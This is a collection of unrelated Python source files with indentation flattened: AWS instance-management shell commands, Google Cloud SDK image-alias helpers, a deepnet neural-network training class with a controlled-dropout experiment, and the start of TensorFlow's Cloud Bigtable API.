parser.add_argument('-R','--replace-key',dest='replaceKey',default=False,action='store_true',help="Replace the host's key. This is useful when AWS recycles an IP address you've seen before.")
parser.add_argument('-Y','--keyscan',dest='keyscan',default=False,action='store_true',help="Perform a keyscan to avoid having to say 'yes' for a new host. Implies -R.")
parser.add_argument('-B','--background',dest='background',default=False,action='store_true',help="Run in the background. (e.g., forward an ssh session and then do other stuff in aws-shell).")
parser.add_argument('-v',dest='verbosity',default=0,action=VAction,nargs='?',help='Verbosity. The more instances, the more verbose');
parser.add_argument('-m',dest='macro',default=False,action='store_true',help='{command} is a series of macros to execute, not the actual command to run on the host');
parser.add_argument(dest='command',nargs='*',help="Command to run on all hosts.") # consider adding a filter option later
args = vars(parser.parse_args(args))
interfaceNumber = int(args['interface-number'])
forwarding = args['forwarding']
replaceKey = args['replaceKey']
keyscan = args['keyscan']
background = args['background']
verbosity = args['verbosity']
ignoreHostKey = args['ignore-host-key']
noEcho = args['no-echo']
# Figure out the host to connect to:
target = args['instance']
try:
index = int(args['instance'])
instances = self.scalingGroupDescription['AutoScalingGroups'][0]['Instances']
instance = instances[index]
target = instance['InstanceId']
except ValueError: # if args['instance'] is not an int, for example.
pass
if args['macro']:
if len(args['command']) > 1:
print("Only one macro may be specified with the -m switch.")
return
else:
macro = args['command'][0]
print("Macro:{}".format(macro))
command = Config.config['ssh-macros'][macro]
else:
command = ' '.join(args['command'])
ssh(target,interfaceNumber,forwarding,replaceKey,keyscan,background,verbosity,command,ignoreHostKey=ignoreHostKey,echoCommand = not noEcho)
def do_startInstance(self,args):
"""Start specified instance"""
parser = CommandArgumentParser("startInstance")
parser.add_argument(dest='instance',help='instance index or name');
args = vars(parser.parse_args(args))
instanceId = args['instance']
force = args['force']
try:
index = int(instanceId)
instances = self.scalingGroupDescription['AutoScalingGroups'][0]['Instances']
instanceId = instances[index]
except ValueError:
pass
client = AwsConnectionFactory.getEc2Client()
client.start_instances(InstanceIds=[instanceId['InstanceId']])
def do_stopInstance(self,args):
"""Stop specified instance"""
parser = CommandArgumentParser("stopInstance")
parser.add_argument(dest='instance',help='instance index or name');
parser.add_argument('-f','--force',action='store_true',dest='force',help='instance index or name');
args = vars(parser.parse_args(args))
instanceId = args['instance']
force = args['force']
try:
index = int(instanceId)
instances = self.scalingGroupDescription['AutoScalingGroups'][0]['Instances']
instanceId = instances[index]
except ValueError:
pass
client = AwsConnectionFactory.getEc2Client()
client.stop_instances(InstanceIds=[instanceId['InstanceId']],Force=force)
def do_terminateInstance(self,args):
"""Terminate an EC2 instance"""
parser = CommandArgumentParser("terminateInstance")
parser.add_argument(dest='instance',help='instance index or name');
args = vars(parser.parse_args(args))
instanceId = args['instance']
try:
index = int(instanceId)
instances = self.scalingGroupDescription['AutoScalingGroups'][0]['Instances']
instanceId = instances[index]
except ValueError:
pass
client = AwsConnectionFactory.getEc2Client()
client.terminate_instances(InstanceIds=[instanceId['InstanceId']])
self.do_printInstances("-r")
def do_updateCapacity(self,args):
"""Set the desired capacity"""
parser = CommandArgumentParser("updateMinMax")
parser.add_argument('-m','--min',dest='min',type=int,help='new values');
parser.add_argument('-M','--max',dest='max',type=int,help='new values');
parser.add_argument('-d','--desired',dest='desired',type=int,help='desired');
args = vars(parser.parse_args(args))
minSize = args['min']
maxSize = args['max']
desired = args['desired']
print "Setting desired capacity to {}-{}, {}".format(minSize,maxSize,desired)
client = AwsConnectionFactory.getAsgClient()
client.update_auto_scaling_group(AutoScalingGroupName=self.scalingGroup,MinSize=minSize,MaxSize=maxSize,DesiredCapacity=desired)
#client.set_desired_capacity(AutoScalingGroupName=self.scalingGroup,DesiredCapacity=value,HonorCooldown=True)
print "Scaling activity in progress"
| |
# Copyright 2014 Google Inc. All Rights Reserved.
"""Common classes and functions for images."""
from googlecloudsdk.compute.lib import constants
from googlecloudsdk.compute.lib import request_helper
from googlecloudsdk.compute.lib import utils
from googlecloudsdk.core import log
from googlecloudsdk.core.util import console_io
class ImageResourceFetcher(object):
"""Mixin class for displaying images."""
class ImageExpander(object):
"""Mixin class for expanding image aliases."""
def GetMatchingImages(self, image, alias, errors):
"""Yields images from a public image project and the user's project."""
service = self.compute.images
requests = [
(service,
'List',
self.messages.ComputeImagesListRequest(
filter='name eq ^{0}(-.+)*-v.+'.format(alias.name_prefix),
maxResults=constants.MAX_RESULTS_PER_PAGE,
project=alias.project)),
(service,
'List',
self.messages.ComputeImagesListRequest(
filter='name eq ^{0}$'.format(image),
maxResults=constants.MAX_RESULTS_PER_PAGE,
project=self.project)),
]
return request_helper.MakeRequests(
requests=requests,
http=self.http,
batch_url=self.batch_url,
errors=errors,
custom_get_requests=None)
def GetImage(self, image_ref):
"""Returns the image resource corresponding to the given reference."""
errors = []
res = list(request_helper.MakeRequests(
requests=[(self.compute.images,
'Get',
self.messages.ComputeImagesGetRequest(
image=image_ref.Name(),
project=image_ref.project))],
http=self.http,
batch_url=self.batch_url,
errors=errors,
custom_get_requests=None))
if errors:
utils.RaiseToolException(
errors,
error_message='Could not fetch image resource:')
return res[0]
def ExpandImageFlag(self, args, return_image_resource=False):
"""Resolves the --image flag value.
If the value of --image is one of the aliases defined in the
constants module, both the user's project and the public image
project for the alias are queried. Otherwise, only the user's
project is queried. If --image is an alias and --image-project is
provided, only the given project is queried.
Args:
args: The command-line flags. The flags accessed are --image and
--image-project.
return_image_resource: If True, always makes an API call to also
fetch the image resource.
Returns:
A tuple where the first element is the self link of the image. If
return_image_resource is False, the second element is None, otherwise
it is the image resource.
"""
image_ref = self.resources.Parse(
args.image or constants.DEFAULT_IMAGE,
collection='compute.images',
resolve=False)
# If an image project was specified, then assume that image refers
# to an image in that project.
if args.image_project:
image_project_ref = self.resources.Parse(
args.image_project,
collection='compute.projects')
image_ref.project = image_project_ref.Name()
image_ref.Resolve()
return (image_ref.SelfLink(),
self.GetImage(image_ref) if return_image_resource else None)
image_ref.Resolve()
alias = constants.IMAGE_ALIASES.get(image_ref.Name())
# If the image name given is not an alias and no image project was
# provided, then assume that the image value refers to an image in
# the user's project.
if not alias:
return (image_ref.SelfLink(),
self.GetImage(image_ref) if return_image_resource else None)
# At this point, the image is an alias and now we have to find the
# latest one among the public image project and the user's
# project.
errors = []
images = self.GetMatchingImages(image_ref.Name(), alias, errors)
user_image = None
public_images = []
for image in images:
if image.deprecated:
continue
if '/projects/{0}/'.format(self.project) in image.selfLink:
user_image = image
else:
public_images.append(image)
if errors or not public_images:
utils.RaiseToolException(
errors,
'Failed to find image for alias [{0}] in public image project [{1}].'
.format(image_ref.Name(), alias.project))
def GetVersion(image):
"""Extracts the "20140718" from an image name like "debian-v20140718"."""
parts = image.name.rsplit('v', 1)
if len(parts) != 2:
log.debug('Skipping image with malformed name [%s].', image.name)
return None
return parts[1]
public_candidate = max(public_images, key=GetVersion)
if user_image:
options = [user_image, public_candidate]
idx = console_io.PromptChoice(
options=[image.selfLink for image in options],
default=0,
message=('Found two possible choices for [--image] value [{0}].'
.format(image_ref.Name())))
res = options[idx]
else:
res = public_candidate
log.debug('Image resolved to [%s].', res.selfLink)
return (res.selfLink, res if return_image_resource else None)
def HasWindowsLicense(resource, resource_parser):
"""Returns True if the given image or disk has a Windows license."""
for license_uri in resource.licenses:
license_ref = resource_parser.Parse(
license_uri, collection='compute.licenses')
if license_ref.project == constants.WINDOWS_IMAGE_PROJECT:
return True
return False
def AddImageProjectFlag(parser):
"""Adds the --image flag to the given parser."""
image_project = parser.add_argument(
'--image-project',
help='The project against which all image references will be resolved.')
image_project.detailed_help = """\
The project against which all image references will be
resolved. See ``--image'' for more details.
"""
def GetImageAliasTable():
"""Returns help text that explains the image aliases."""
# Note: The leading spaces are very important in this string. The
# final help text is dedented, so if the leading spaces are off, the
# help will not be generated properly.
return """The value for this option can be the name of an image or an
alias from the table below.
[options="header",format="csv",grid="none",frame="none"]
|========
Alias,Project,Image Name
{0}
|========
When the value is an alias, this tool will query the public
image project that contains the image type to find the
latest image matching the alias. The user's project is also
queried for an image with the same name as the alias. If a
conflict exists, the user will be prompted to resolve the
conflict.
To specify an image in another project for which there is no
alias, use ``--image-project''. When ``--image-project'' is
present, no API calls are made to resolve the image. This
property is useful for scripts.""".format(
'\n '.join(
','.join([alias, project, image_name])
for alias, (project, image_name) in
sorted(constants.IMAGE_ALIASES.iteritems())))
| |
"""Implements a feed-forward neural net."""
import gzip
import logging
import sys
import time
import csv
from google.protobuf import text_format
from datahandler import *
from convolutions import *
from edge import *
from layer import *
from util import *
from logistic_layer import *
from tanh_layer import *
from relu_layer import *
from smooth_relu_layer import *
from linear_layer import *
from softmax_layer import *
from replicated_softmax_layer import *
from cos_layer import *
from sin_layer import *
from transfer_edge import *
from soft_transfer_edge import *
import eigenmat as mat
class NeuralNet(object):
def __init__(self, net, cd=False, t_op=None, e_op=None):
self.net = None
if isinstance(net, deepnet_pb2.Model):
self.net = net #ff
elif isinstance(net, str) or isinstance(net, unicode):
self.net = ReadModel(net)
self.t_op = None
if isinstance(t_op, deepnet_pb2.Operation):
self.t_op = t_op
elif isinstance(t_op, str) or isinstance(net, unicode):
self.t_op = ReadOperation(t_op)
self.e_op = None
if isinstance(e_op, deepnet_pb2.Operation):
self.e_op = e_op #ff
elif isinstance(e_op, str) or isinstance(net, unicode):
self.e_op = ReadOperation(e_op)
cm.CUDAMatrix.init_random(self.net.seed)
np.random.seed(self.net.seed)
self.data = None
self.layer = [] # has bias
self.edge = [] # has weight
self.input_datalayer = []
self.output_datalayer = []
self.datalayer = []
self.tied_datalayer = []
self.unclamped_layer = []
self.verbose = False
self.batchsize = 0
if self.t_op: #ff
self.verbose = self.t_op.verbose
self.batchsize = self.t_op.batchsize
elif self.e_op:
self.verbose = self.e_op.verbose
self.batchsize = self.e_op.batchsize
self.train_stop_steps = sys.maxint
self.cd = cd
def PrintNetwork(self):
for layer in self.layer:
print layer.name
layer.PrintNeighbours()
def DeepCopy(self):
return CopyModel(self.net)
def LoadModelOnGPU(self, batchsize=-1):
"""Load the model on the GPU."""
if batchsize < 0:
if self.t_op:
batchsize=self.t_op.batchsize
else:
batchsize=self.e_op.batchsize
for layer in self.net.layer:
layer.hyperparams.MergeFrom(LoadMissing(layer.hyperparams,
self.net.hyperparams))
if not layer.prefix:
layer.prefix = self.net.prefix
tied_to = None
if layer.tied:
tied_to = next(l for l in self.layer if l.name == layer.tied_to)
self.layer.append(CreateLayer(Layer, layer, self.t_op, tied_to=tied_to))
for edge in self.net.edge:
hyp = deepnet_pb2.Hyperparams()
hyp.CopyFrom(self.net.hyperparams)
hyp.MergeFrom(edge.hyperparams)
edge.hyperparams.MergeFrom(hyp)
try:
node1 = next(layer for layer in self.layer if layer.name == edge.node1)
except StopIteration:
print edge.node1, [l.name for l in self.layer]
node2 = next(layer for layer in self.layer if layer.name == edge.node2)
if not edge.prefix:
edge.prefix = self.net.prefix
tied_to = None
if edge.tied:
tied_to = next(e for e in self.edge if e.node1.name == edge.tied_to_node1 and e.node2.name == edge.tied_to_node2)
self.edge.append(CreateEdge(Edge, edge, node1, node2, self.t_op, tied_to=tied_to))
self.input_datalayer = [node for node in self.layer if node.is_input]
self.output_datalayer = [node for node in self.layer if node.is_output]
self.node_list = self.Sort()
def ExchangeGlobalInfo(self):
for layer in self.layer:
layer.GetGlobalInfo(self)
for edge in self.edge:
edge.GetGlobalInfo(self)
def Sort(self):
"""Topological sort."""
node_list = []
S = [node for node in self.layer if not node.incoming_neighbour]
while S:
n = S.pop()
node_list.append(n)
for m in n.outgoing_edge:
if m.marker == 0:
m.marker = 1
if reduce(lambda a, edge: a and edge.marker == 1,
m.node2.incoming_edge, True):
S.append(m.node2)
if reduce(lambda a, edge: a and edge.marker == 1, self.edge, True):
if self.verbose:
print 'Fprop Order:'
for node in node_list:
print node.name
else:
raise Exception('Invalid net for backprop. Cycle exists.')
return node_list
def ComputeUp(self, layer, step, train=False, maxsteps=0):
"""
Computes the state of `layer', given the state of its incoming neighbours.
Args:
layer: Layer whose state is to be computed.
train: True if this computation is happening during training, False during evaluation.
step: Training step.
maxsteps: Maximum number of steps that will be taken (Needed because some
hyperparameters may depend on this).
"""
layer.dirty = False
perf = None
if layer.is_input or layer.is_initialized: # for input layer
layer.GetData()
else:
for i, edge in enumerate(layer.incoming_edge):
if edge in layer.outgoing_edge:
continue
inputs = layer.incoming_neighbour[i].state
if edge.conv or edge.local:
if i == 0:
ConvolveUp(inputs, edge, layer.state)
else:
AddConvoleUp(inputs, edge, layer.state)
else:
w = edge.params['weight']
factor = edge.proto.up_factor
if i == 0:
cm.dot(w.T, inputs, target=layer.state) # dot product between input and w
if factor != 1:
layer.state.mult(factor)
else:
layer.state.add_dot(w.T, inputs, mult=factor)
b = layer.params['bias']
if layer.replicated_neighbour is None:
layer.state.add_col_vec(b)
else:
layer.state.add_dot(b, layer.replicated_neighbour.NN)
layer.ApplyActivation() # apply activation function here
# TODO: Done_Controlled dropout without dimension reduction
if self.cd == True:
if not self.EvalNow(step):
if layer.activation==3:
# Controlled dropout
a= layer.state.shape[0]
b= np.random.choice(range(2),(a,1))
# b = np.array([[1], [0], [1], [0], [1], [0], [1], [0], [1], [0]])
layer.state.mult_by_col(mat.EigenMatrix(b))
else:
# multiply the dropout rate
if layer.activation==3: # when it is hidden layer
# Controlled dropout
layer.state.mult(0.5)
if layer.hyperparams.sparsity:
layer.state.sum(axis=1, target=layer.dimsize)
perf = deepnet_pb2.Metrics()
perf.MergeFrom(layer.proto.performance_stats)
perf.count = layer.batchsize
perf.sparsity = layer.dimsize.sum() / layer.dimsize.shape[0]
if layer.hyperparams.dropout: # If there is dropout option in the hyperparams
if train and maxsteps - step >= layer.hyperparams.stop_dropout_for_last:
# Randomly set states to zero.
if layer.hyperparams.mult_dropout:
layer.mask.fill_with_randn()
layer.mask.add(1)
layer.state.mult(layer.mask)
else:
layer.mask.fill_with_rand()
layer.mask.greater_than(layer.hyperparams.dropout_prob)
if layer.hyperparams.blocksize > 1:
layer.mask.blockify(layer.hyperparams.blocksize)
layer.state.mult(layer.mask)
else:
# Produce expected output.
if layer.hyperparams.mult_dropout:
pass
else:
layer.state.mult(1.0 - layer.hyperparams.dropout_prob)
return perf
def ComputeDown(self, layer, step):
"""Backpropagate through this layer.
Args:
step: The training step. Needed because some hyperparameters depend on
which training step they are being used in.
"""
if layer.is_input: # Nobody to backprop to.
return
# At this point layer.deriv contains the derivative with respect to the
# outputs of this layer. Compute derivative with respect to the inputs.
if layer.is_output:
loss = layer.GetLoss(get_deriv=True)
else:
loss = None
if layer.hyperparams.sparsity:
sparsity_gradient = layer.GetSparsityGradient()
layer.deriv.add_col_vec(sparsity_gradient)
layer.ComputeDeriv()
# Now layer.deriv contains the derivative w.r.t to the inputs.
# Send it down each incoming edge and update parameters on the edge.
for edge in layer.incoming_edge:
if edge.conv or edge.local:
AccumulateConvDeriv(edge.node1, edge, layer.deriv)
else:
self.AccumulateDeriv(edge.node1, edge, layer.deriv)
self.UpdateEdgeParams(edge, layer.deriv, step)
# $$ Update bias into the original bias vector here
# Update the parameters on this layer (i.e., the bias).
self.UpdateLayerParams(layer, step)
# $$ Update small weight into the original weight matrix here
return loss
def AccumulateDeriv(self, layer, edge, deriv):
"""Accumulate the derivative w.r.t the outputs of this layer.
A layer needs to compute derivatives w.r.t its outputs. These outputs may
have been connected to lots of other nodes through outgoing edges.
This method adds up the derivatives contributed by each outgoing edge.
It gets derivatives w.r.t the inputs at the other end of its outgoing edge.
Args:
edge: The edge which is sending the derivative.
deriv: The derivative w.r.t the inputs at the other end of this edge.
"""
if layer.is_input or edge.proto.block_gradient:
return
if layer.dirty: # If some derivatives have already been received.
layer.deriv.add_dot(edge.params['weight'], deriv)
else: # Receiving derivative for the first time.
cm.dot(edge.params['weight'], deriv, target=layer.deriv)
layer.dirty = True
def UpdateEdgeParams(self, edge, deriv, step):
""" Update the parameters associated with this edge.
Update the weights and associated parameters.
Args:
deriv: Gradient w.r.t the inputs at the outgoing end.
step: Training step.
"""
numcases = edge.node1.batchsize
if edge.conv or edge.local:
ConvOuter(edge, edge.temp)
edge.gradient.add_mult(edge.temp, mult=1.0/numcases)
else:
edge.gradient.add_dot(edge.node1.state, deriv.T, mult=1.0/numcases)
if edge.tied_to:
edge.tied_to.gradient.add(edge.gradient)
edge.gradient.assign(0)
edge = edge.tied_to
edge.num_grads_received += 1
if edge.num_grads_received == edge.num_shares:
edge.Update('weight', step)
def UpdateLayerParams(self, layer, step):
""" Update the parameters associated with this layer.
Update the bias.
Args:
step: Training step.
"""
layer.gradient.add_sums(layer.deriv, axis=1, mult=1.0 / layer.batchsize)
if layer.tied_to:
layer.tied_to.gradient.add(layer.gradient)
layer.gradient.assign(0)
layer = layer.tied_to
layer.num_grads_received += 1
if layer.num_grads_received == layer.num_shares:
layer.Update('bias', step, no_reg=True) # By default, do not regularize bias.
def ForwardPropagate(self, train=False, step=0):
"""Do a forward pass through the network.
Args:
train: True if the forward pass is done during training, False during
evaluation.
step: Training step.
"""
losses = []
for node in self.node_list:
loss = self.ComputeUp(node, train, step, self.train_stop_steps)
if loss:
losses.append(loss)
return losses
def BackwardPropagate(self, step):
"""Backprop through the network.
Args:
step: Training step.
"""
losses = []
for node in reversed(self.node_list):
loss = self.ComputeDown(node, step)
if loss:
losses.append(loss)
return losses
def TrainOneBatch(self, step):
"""Train once on one mini-batch.
Args:
step: Training step.
Returns:
List of losses incurred at each output layer.
"""
losses1 = self.ForwardPropagate(train=True, step=step)
losses2 = self.BackwardPropagate(step)
losses1.extend(losses2)
return losses1
def EvaluateOneBatch(self):
"""Evaluate one mini-batch."""
losses = self.ForwardPropagate()
losses.extend([node.GetLoss() for node in self.output_datalayer])
return losses
def Evaluate(self, validation=True, collect_predictions=False):
"""Evaluate the model.
Args:
validation: If True, evaluate on the validation set,
else evaluate on test set.
collect_predictions: If True, collect the predictions.
"""
step = 0
stats = []
if validation:
stopcondition = self.ValidationStopCondition
stop = stopcondition(step)
if stop or self.validation_data_handler is None:
return
datagetter = self.GetValidationBatch
prefix = 'V'
stats_list = self.net.validation_stats
num_batches = self.validation_data_handler.num_batches
else:
stopcondition = self.TestStopCondition
stop = stopcondition(step)
if stop or self.test_data_handler is None:
return
datagetter = self.GetTestBatch
prefix = 'E'
stats_list = self.net.test_stats
num_batches = self.test_data_handler.num_batches
if collect_predictions:
output_layer = self.output_datalayer[0]
collect_pos = 0
batchsize = output_layer.batchsize
numdims = output_layer.state.shape[0]
predictions = np.zeros((batchsize * num_batches, numdims))
targets = np.zeros(predictions.shape)
while not stop:
datagetter()
losses = self.EvaluateOneBatch()
if collect_predictions:
predictions[collect_pos:collect_pos + batchsize] = \
output_layer.state.asarray().T
targets[collect_pos:collect_pos + batchsize] = \
output_layer.data.asarray().T
collect_pos += batchsize
if stats:
for loss, acc in zip(losses, stats):
Accumulate(acc, loss)
else:
stats = losses
step += 1
stop = stopcondition(step)
if collect_predictions and stats:
predictions = predictions[:collect_pos]
targets = targets[:collect_pos]
MAP, prec50, MAP_list, prec50_list = self.ComputeScore(predictions, targets)
stat = stats[0]
stat.MAP = MAP
stat.prec50 = prec50
for m in MAP_list:
stat.MAP_list.extend([m])
for m in prec50_list:
stat.prec50_list.extend([m])
for stat in stats:
sys.stdout.write(GetPerformanceStats(stat, prefix=prefix))
stats_list.extend(stats)
return stat
def ScoreOneLabel(self, preds, targets):
"""Computes Average precision and precision at 50."""
targets_sorted = targets[(-preds.T).argsort().flatten(),:]
cumsum = targets_sorted.cumsum()
prec = cumsum / np.arange(1.0, 1 + targets.shape[0])
total_pos = float(sum(targets))
if total_pos == 0:
total_pos = 1e-10
recall = cumsum / total_pos
ap = np.dot(prec, targets_sorted) / total_pos
prec50 = prec[50]
return ap, prec50
def ComputeScore(self, preds, targets):
"""Computes Average precision and precision at 50."""
assert preds.shape == targets.shape
numdims = preds.shape[1]
ap = 0
prec = 0
ap_list = []
prec_list = []
for i in range(numdims):
this_ap, this_prec = self.ScoreOneLabel(preds[:,i], targets[:,i])
ap_list.append(this_ap)
prec_list.append(this_prec)
ap += this_ap
prec += this_prec
ap /= numdims
prec /= numdims
return ap, prec, ap_list, prec_list
def WriteRepresentationToDisk(self, layernames, output_dir, memory='1G',
dataset='test', drop=False):
layers = [self.GetLayerByName(lname) for lname in layernames]
numdim_list = [layer.state.shape[0] for layer in layers]
if dataset == 'train':
datagetter = self.GetTrainBatch
if self.train_data_handler is None:
return
numbatches = self.train_data_handler.num_batches
size = numbatches * self.train_data_handler.batchsize
elif dataset == 'validation':
datagetter = self.GetValidationBatch
if self.validation_data_handler is None:
return
numbatches = self.validation_data_handler.num_batches
size = numbatches * self.validation_data_handler.batchsize
elif dataset == 'test':
datagetter = self.GetTestBatch
if self.test_data_handler is None:
return
numbatches = self.test_data_handler.num_batches
size = numbatches * self.test_data_handler.batchsize
datawriter = DataWriter(layernames, output_dir, memory, numdim_list, size)
for batch in range(numbatches):
datagetter()
sys.stdout.write('\r%d' % (batch+1))
sys.stdout.flush()
self.ForwardPropagate(train=drop)
reprs = [l.state.asarray().T for l in layers]
datawriter.Submit(reprs)
sys.stdout.write('\n')
return datawriter.Commit()
def TrainStopCondition(self, step):
return step >= self.train_stop_steps
def ValidationStopCondition(self, step):
return step >= self.validation_stop_steps
def TestStopCondition(self, step):
return step >= self.test_stop_steps
def EvalNow(self, step):
return step % self.eval_now_steps == 0
def SaveNow(self, step):
return step % self.save_now_steps == 0
def ShowNow(self, step):
return self.show_now_steps > 0 and step % self.show_now_steps == 0
def GetLayerByName(self, layername, down=False):
try:
l = next(l for l in self.layer if l.name == layername)
except StopIteration:
l = None
return l
def CopyModelToCPU(self):
for layer in self.layer:
layer.SaveParameters()
for edge in self.edge:
edge.SaveParameters()
def ResetBatchsize(self, batchsize):
self.batchsize = batchsize
for layer in self.layer:
layer.AllocateBatchsizeDependentMemory(batchsize)
for edge in self.edge:
edge.AllocateBatchsizeDependentMemory()
def GetBatch(self, handler=None):
if handler:
data_list = handler.Get()
if data_list[0].shape[1] != self.batchsize:
self.ResetBatchsize(data_list[0].shape[1])
for i, layer in enumerate(self.datalayer):
layer.SetData(data_list[i])
for layer in self.tied_datalayer:
data = layer.data_tied_to.data
if data.shape[1] != self.batchsize:
self.ResetBatchsize(data.shape[1])
layer.SetData(data)
def GetTrainBatch(self):
self.GetBatch(self.train_data_handler)
def GetValidationBatch(self):
self.GetBatch(self.validation_data_handler)
def GetTestBatch(self):
self.GetBatch(self.test_data_handler)
def SetUpData(self, skip_outputs=False, skip_layernames=[]):
"""Setup the data."""
hyp_list = []
name_list = [[], [], []]
for node in self.layer:
if not (node.is_input or node.is_output):
continue
if skip_outputs and node.is_output:
continue
if node.name in skip_layernames:
continue
data_field = node.proto.data_field
if data_field.tied:
self.tied_datalayer.append(node)
node.data_tied_to = next(l for l in self.datalayer\
if l.name == data_field.tied_to)
else:
self.datalayer.append(node)
hyp_list.append(node.hyperparams)
if data_field.train:
name_list[0].append(data_field.train)
if data_field.validation:
name_list[1].append(data_field.validation)
if data_field.test:
name_list[2].append(data_field.test)
if self.t_op:
op = self.t_op
else:
op = self.e_op
handles = GetDataHandles(op, name_list, hyp_list,
verbose=self.verbose)
self.train_data_handler = handles[0]
self.validation_data_handler = handles[1]
self.test_data_handler = handles[2]
def SetUpTrainer(self):
"""Load the model, setup the data, set the stopping conditions."""
self.LoadModelOnGPU()
if self.verbose:
self.PrintNetwork()
self.SetUpData()
if self.t_op.stopcondition.all_processed:
num_steps = self.train_data_handler.num_batches
else:
num_steps = self.t_op.stopcondition.steps
self.train_stop_steps = num_steps
if self.e_op.stopcondition.all_processed and self.validation_data_handler:
num_steps = self.validation_data_handler.num_batches
else:
num_steps = self.e_op.stopcondition.steps
self.validation_stop_steps = num_steps
if self.e_op.stopcondition.all_processed and self.test_data_handler:
num_steps = self.test_data_handler.num_batches
else:
num_steps = self.e_op.stopcondition.steps
self.test_stop_steps = num_steps
self.eval_now_steps = self.t_op.eval_after
self.save_now_steps = self.t_op.checkpoint_after
self.show_now_steps = self.t_op.show_after
self.ExchangeGlobalInfo()
def Show(self):
"""Visualize the state of the layers and edges in the network."""
for layer in self.layer:
layer.Show()
for edge in self.edge:
edge.Show()
def Train(self):
"""Train the model."""
start_time = time.time()
assert self.t_op is not None, 't_op is None.'
assert self.e_op is not None, 'e_op is None.'
self.SetUpTrainer()
step = self.t_op.current_step
stop = self.TrainStopCondition(step)
stats = []
collect_predictions = False
try:
p = self.output_datalayer[0].proto.performance_stats
if p.compute_MAP or p.compute_prec50:
collect_predictions = True
except Exception as e:
pass
select_model_using_error = self.net.hyperparams.select_model_using_error
select_model_using_acc = self.net.hyperparams.select_model_using_acc
select_model_using_map = self.net.hyperparams.select_model_using_map
select_best = select_model_using_error or select_model_using_acc or select_model_using_map
if select_best:
best_valid_error = float('Inf')
test_error = float('Inf')
best_net = self.DeepCopy()
dump_best = False
with open('/home/hpc/github/ControlledDropout/deepnet/examples/csv/CDX.csv', 'w') as csvfile:
fieldnames = ['Step', 'T_CE', 'T_Acc', 'T_Res', 'V_CE', 'V_Acc', 'V_Res', 'E_CE', 'E_Acc', 'E_Res', 'Time']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
while not stop:
sys.stdout.write('\rTrain Step: %d' % step)
sys.stdout.flush()
self.GetTrainBatch()
#self.GetRandomNum()
losses = self.TrainOneBatch(step)
if stats:
for acc, loss in zip(stats, losses):
Accumulate(acc, loss)
else:
stats = losses
step += 1
if self.ShowNow(step):
self.Show()
if self.EvalNow(step):
# Print out training stats.
sys.stdout.write('\rStep %d ' % step)
for stat in stats:
sys.stdout.write(GetPerformanceStats(stat, prefix='T'))
self.net.train_stats.extend(stats)
stats = []
# Evaluate on validation set.
val = self.Evaluate(validation=True, collect_predictions=collect_predictions)
# Evaluate on test set.
tes = self.Evaluate(validation=False, collect_predictions=collect_predictions)
# Write on csv file
writer.writerow({'Step': step,
'T_CE': stat.cross_entropy / stat.count,
'T_Acc': stat.correct_preds / stat.count,
'T_Res': stat.correct_preds,
'V_CE': val.cross_entropy / val.count,
'V_Acc': val.correct_preds / val.count,
'V_Res': val.correct_preds,
'E_CE': tes.cross_entropy / tes.count,
'E_Acc': tes.correct_preds / tes.count,
'E_Res': tes.correct_preds,
'Time': time.time() - start_time
})
if select_best:
valid_stat = self.net.validation_stats[-1]
if len(self.net.test_stats) > 1:
test_stat = self.net.test_stats[-1]
else:
test_stat = valid_stat
if select_model_using_error:
valid_error = valid_stat.error / valid_stat.count
_test_error = test_stat.error / test_stat.count
elif select_model_using_acc:
valid_error = 1 - float(valid_stat.correct_preds) / valid_stat.count
_test_error = 1 - float(test_stat.correct_preds) / test_stat.count
elif select_model_using_map:
valid_error = 1 - valid_stat.MAP
_test_error = 1 - test_stat.MAP
if valid_error < best_valid_error:
best_valid_error = valid_error
test_error = _test_error
dump_best = True
self.CopyModelToCPU()
self.t_op.current_step = step
self.net.best_valid_stat.CopyFrom(valid_stat)
self.net.train_stat_es.CopyFrom(self.net.train_stats[-1])
self.net.test_stat_es.CopyFrom(test_stat)
best_net = self.DeepCopy()
best_t_op = CopyOperation(self.t_op)
#for e in self.edge:
# sys.stdout.write(' %s %.3f' % (e.name, e.params['weight'].euclid_norm()))
sys.stdout.write('\n')
if self.SaveNow(step):
self.t_op.current_step = step
self.CopyModelToCPU()
util.WriteCheckpointFile(self.net, self.t_op)
if dump_best:
dump_best = False
if select_model_using_error:
print 'Best valid error : %.4f Test error %.4f' % (best_valid_error, test_error)
elif select_model_using_acc:
print 'Best valid acc : %.4f Test acc %.4f' % (1-best_valid_error, 1-test_error)
elif select_model_using_map:
print 'Best valid MAP : %.4f Test MAP %.4f' % (1-best_valid_error, 1-test_error)
util.WriteCheckpointFile(best_net, best_t_op, best=True)
stop = self.TrainStopCondition(step)
| |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Python API for TensorFlow's Cloud Bigtable integration.
TensorFlow has support for reading from and writing to Cloud Bigtable. To use
TensorFlow + Cloud Bigtable integration, first create a BigtableClient to
configure your connection to Cloud Bigtable, and then create a BigtableTable
object to allow you to create numerous `tf.data.Dataset`s to read data, or
write a `tf.data.Dataset` object to the underlying Cloud Bigtable table.
For background on Cloud Bigtable, see: https://cloud.google.com/bigtable .
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six import iteritems
from six import string_types
from tensorflow.contrib.bigtable.ops import gen_bigtable_ops
from tensorflow.contrib.data.python.ops import interleave_ops
from tensorflow.contrib.util import loader
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.platform import resource_loader
_bigtable_so = loader.load_op_library(
resource_loader.get_path_to_datafile("_bigtable.so"))
class BigtableClient(object):
"""BigtableClient is the entrypoint for interacting with Cloud Bigtable in TF.
BigtableClient encapsulates a connection to Cloud Bigtable, and exposes the
`table` method to open a Bigtable table.
"""
def __init__(self,
project_id,
instance_id,
connection_pool_size=None,
max_receive_message_size=None):
"""Creates a BigtableClient that can be used to open connections to tables.
Args:
project_id: A string representing the GCP project id to connect to.
instance_id: A string representing the Bigtable instance to connect to.
connection_pool_size: (Optional.) A number representing the number of
